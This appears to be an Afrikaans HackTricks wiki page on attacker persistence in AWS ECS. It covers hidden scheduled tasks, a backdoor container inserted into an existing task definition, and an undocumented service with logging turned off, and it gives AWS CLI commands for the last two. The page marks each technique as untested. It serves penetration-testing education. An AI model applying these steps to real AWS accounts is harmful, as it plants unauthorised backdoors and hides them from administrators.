AWS - ECS Persistence

PreviousAWS - ECR Persistence NextAWS - Elastic Beanstalk Persistence

Last updated 3 days ago

AWS - ECS Persistence

Leer & oefen AWS Hacking: Leer & oefen GCP Hacking:

Ondersteun HackTricks

Kyk na die !
Sluit aan by die 💬 of die of volg ons op Twitter 🐦 .
Deel hacking truuks deur PRs in te dien na die en github repos.

ECS

Vir meer inligting, kyk:

Verborgen Periodieke ECS Taak

TODO: Toets

'n Aanvaller kan 'n verborgen periodieke ECS-taak skep met behulp van Amazon EventBridge om die uitvoering van 'n kwaadwillige taak periodiek te skeduleer. Hierdie taak kan verkenning uitvoer, data uitkoppel of volharding in die AWS-rekening handhaaf.

Backdoor-container in Bestaande ECS Taakdefinisie

TODO: Toets

'n Aanvaller kan 'n stealthy backdoor-container by 'n bestaande ECS taakdefinisie voeg wat saam met wettige containers loop. Die backdoor-container kan gebruik word vir volharding en om kwaadwillige aktiwiteite uit te voer.

Ondokumenteerde ECS-diens

TODO: Toets

'n Aanvaller kan 'n ondokumenteerde ECS-diens skep wat 'n kwaadwillige taak uitvoer. Deur die verlangde aantal take tot 'n minimum te stel en logging te deaktiveer, word dit moeiliker vir administrateurs om die kwaadwillige diens op te merk.

Ondersteun HackTricks

PreviousAWS - ECR Persistence NextAWS - Elastic Beanstalk Persistence

Last updated 3 days ago

ECS

Vir meer inligting, kyk:

Verborgen Periodieke ECS Taak

TODO: Toets

Backdoor-container in Bestaande ECS Taakdefinisie

TODO: Toets

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Ondokumenteerde ECS-diens

TODO: Toets

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"

Leer & oefen AWS Hacking: Leer & oefen GCP Hacking:

Ondersteun HackTricks

Kyk na die !
Sluit aan by die 💬 of die of volg ons op Twitter 🐦 .
Deel hacking truuks deur PRs in te dien na die en github repos.